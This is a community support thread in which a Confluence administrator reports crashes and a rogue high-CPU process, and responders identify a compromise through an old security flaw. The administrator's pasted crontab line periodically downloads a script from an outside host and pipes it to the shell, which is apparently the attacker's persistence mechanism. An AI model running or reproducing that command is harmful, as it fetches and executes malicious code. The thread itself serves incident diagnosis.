Confluence stops after few minutes and processor spikes

Sorel @ Inventiff. October 17, 2019

Hi,

Confluence is stopping every few minutes and after this is happening I have a process owned by confluence1 with command  ./kpsmoseds that use 394% of CPU and a command [khungtaskd] that use 63.10 of CPU

Any suggestions?

Thank you!

*/10 * * * * (curl -fsSL -m15 lsd.systemten.org||wget -q -T15 -O- lsd.systemten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.systemten.org").read()')|sh

Hi Sorel @ Inventiff. ,

your Confluence server has been compromised because you might be running an older version of Confluence that has a security issue : https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

If possible you should stop this server and only backup your Confluence data, and restore it on a new server with the latest Confluence version.

Thank you!

Do I need to start the whole installing process?

Is there any way to just update it?

Hi Sorel @ Inventiff. ,

can you have a look at your catalina.out log and see if there are any lines starting with ERROR ? It would be useful to see why the process stops after only a few minutes.

Can you also give more information on how much memory and CPU your server has ?

Thanks,
